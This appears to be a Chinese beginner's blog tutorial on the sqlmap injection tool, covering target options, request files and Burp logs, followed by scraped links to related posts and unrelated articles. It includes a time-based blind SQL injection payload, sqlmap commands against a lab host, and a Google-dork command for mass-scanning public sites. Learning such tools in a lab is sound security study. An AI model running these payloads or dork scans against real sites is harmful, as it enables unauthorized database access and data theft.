SQLmap的自动注入学习之路(1)

是通过五种sql注入漏洞的检测技术

' and(select*from(select(sleep(20)))a)#

这是基于时间的盲注检测 看他返回的时间 可以在DVWA试试

sqlmap支持非常全面的()数据库管理系统DBMS

-d 参数直接连接 作为客服端连上服务器端

mysql 3306端口 orcle的1521   sqlsever的1433

我们先来查看一下sqlmap的版本

sqlmap.py --version

sqlmap.py -h(看参数)

               -hh(显示更详细的的参数)

一Target(连接)

Sqlmap 针对关系型数据库的自动化注入工具,如mysql,mssql,oracle

由于DVWA需要cookie注入 所以我们换一个网站不需要登陆的网站

sqlmap.py -u "http://1192.168.1.101/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p username -f

-p是指定参数的注入 -f是指纹 这是最简单的扫描了

sqlmap.py -u “” -username -dbs -a

查看当前数据库的使用名 查看是否最高权限

这是数据库名 然后表名 然后列名

看这里就用了三种检测方法都可以注入

-d

sqlmap.py -d "mysql://root:toor@192.168.1.101:3306/dwva"

直连数据库的操作

-m也可以扫描list.txt文件 扫描txt里面的url

sqlmap.py -m list.txt --dbs

扫描google搜索结果

如果你想扫描url里面含有.php?id=1都去尝试注入

sqlmap.py -g "inurl:\".php?id=1\""

加下划线是转义的因为让电脑知道这个“”就是双引号本身

刚才上面的方法都是GET方法来检查传输的 所有的都是通过URL来进行传输的 如果是POST方法呐

1使用http的请求文件(burpsuit)

sqlmap.py -r request.txt(让他自己去http请求头里面找每一个参数进行注入)

接下来我们演示一下

复制下来 然后新建一个文本文件 post.txt然后把上面的内容粘贴进去

sqlmap.py -r post.txt --dbs

2使用burpsuit log文件

sqlmap.py -l log.txt

首先要配置一下我们访问过程中的log文件

有很多种 这里为了方便我们选代理类型的文件 然后选择存放位置保存为Log.txt凡是我的访问都会被放到log.txt里面

先识别到了一个url 1 然后问我们是否进行注入检测

因为时间过长 我们对username进行检查-p username

因为这里没有我们要的参数所以会报错

HTTPS

sqlmap -u "url" -force-ssl

扫描配置文件

sqlmap -c sqlmap.conf

二Request

切记(少就是多 慢就是快)

sqlmap自动注入1(Target完整的超级详细 如有错误望指出)的更多相关文章

  1. 小白日记43:kali渗透测试之Web渗透-SqlMap自动注入(一)-sqlmap参数详解TARGET

    SqlMap自动注入(一) sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞[动态页面中get/post参数.cookie.HTTP头].它由Python语言开发 ...

  2. 小白日记44:kali渗透测试之Web渗透-SqlMap自动注入(二)-sqlmap参数详解REQUEST

    Sqlmap自动注入(二) Request ################################################### #inurl:.php?id= 1. 数据段:--d ...

  3. 小白日记46:kali渗透测试之Web渗透-SqlMap自动注入(四)-sqlmap参数详解- Enumeration,Brute force,UDF injection,File system,OS,Windows Registry,General,Miscellaneous

    sqlmap自动注入 Enumeration[数据枚举] --privileges -U username[CU 当前账号] -D dvwa -T users -C user --columns  [ ...

  4. 小白日记45:kali渗透测试之Web渗透-SqlMap自动注入(三)-sqlmap参数详解-Optimization,Injection,Detection,Techniques,Fingerprint

    sqlmap自动注入 Optimization [优化性能参数,可提高效率] -o:指定前三个参数(--predict-output.--keep-alive.--null-connection) - ...

  5. dvwa——sql手动注入和sqlmap自动注入

    手动注入 low: 源码: <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; ...

  6. SQLMAP自动注入(一):sqlmap的简单使用和配合burpsuite使用

    python编写,开源 检测方式 基于布尔的盲注检测 基于时间的盲注检测 基于错误的检测 基于union的检测 基于堆叠的检测 优点 数据库直连 -d cookie过期后自动更新cookie信息 可以 ...

  7. Sqlmap自动注入--REQEST

    数据段: --data sqlmap.py -u ”192.168.1.101/mullitea/login.php" --data="username&passwd=2& ...

  8. SQLMAP自动注入(三):参数介绍

    --delay延时扫描 --scope 从burpsuit日志中过滤日志内容,通过正则表达式筛选扫描目标,19开头,尾数为1.11.121.221的目标 --level=3 会检查user-agent ...

  9. SQLMAP自动注入(二)

    --data 添加post头 --data 添加get头 --cookie 添加cookie 设置探测级别大于等于2时会探测cookie是否有注入点 --random-agent 随机生成user-a ...

随机推荐

  1. Tomcat的安全性

    Web应用程序的一些内容是受限的,只有授权的用户在提供了正确的用户名和密码后才能查看他们,servlet技术支持通过配置部署 描述器(web.xml)来对这些内容进行访问控制,那么web容器是怎么样支 ...

  2. java知识点复习(1):

    1.java整形变量078:在java数字里数字表达式前面加上0表示8进制,因为8进制里表示数字只有0-7,所以这里的表达式有错误.相对而言,077就是合法的,转换成10进制就是63(7*8+7=63 ...

  3. 如何在万亿级别规模的数据量上使用Spark

    一.前言 Spark作为大数据计算引擎,凭借其快速.稳定.简易等特点,快速的占领了大数据计算的领域.本文主要为作者在搭建使用计算平台的过程中,对于Spark的理解,希望能给读者一些学习的思路.文章内容 ...

  4. 【Lucene】小谈lucene的BooleanQuery查询对象

    BooleanQuery用于逻辑查询,即所谓的组合查询,具体的逻辑关系如下: 一个具体的使用测试,如下:

  5. Support for the experimental syntax 'classProperties' isn't currently enabled

    项目中使用高级语法报错, 报错信息 SyntaxError: E:\workdata\webpackVue\src\index.js: Support for the experimental syn ...

  6. mysql truncate 与 delete的相同点和不同点

    相同点 都可以清空表,自增字段将起始值恢复成1 [delete from table_name where 1 可以保持自增的最大值] delete from table_name; truncate ...

  7. Jansson库的使用简介

    一.Jansson的安装: 二.jansson相关的API: https://jansson.readthedocs.io/en/latest/apiref.html#c.json_t string ...

  8. Linux三剑客:grep、awk、sed

    ---------------------------------------------------------------------------------------------------- ...

  9. 架构师成长之路5.4-Saltstack配置管理(LAMP架构案例)

    点击架构师成长之路 架构师成长之路5.4-Saltstack配置管理(LAMP架构案例) 配置管理工具: Pupper:1. 采用ruby编程语言:2. 安装环境相对较复杂:3.不支持远程执行,需要F ...

  10. RDO远程连接时错误提示解决办法

    RDO远程连接时提示“远程计算机需要网络级别身份验证,而您的计算机不支持该验证,请联系您的系统管理员或者技术人员来获得帮助” 1.先用个人电脑自带远程工具mstsc连接到服务器Windows Serv ...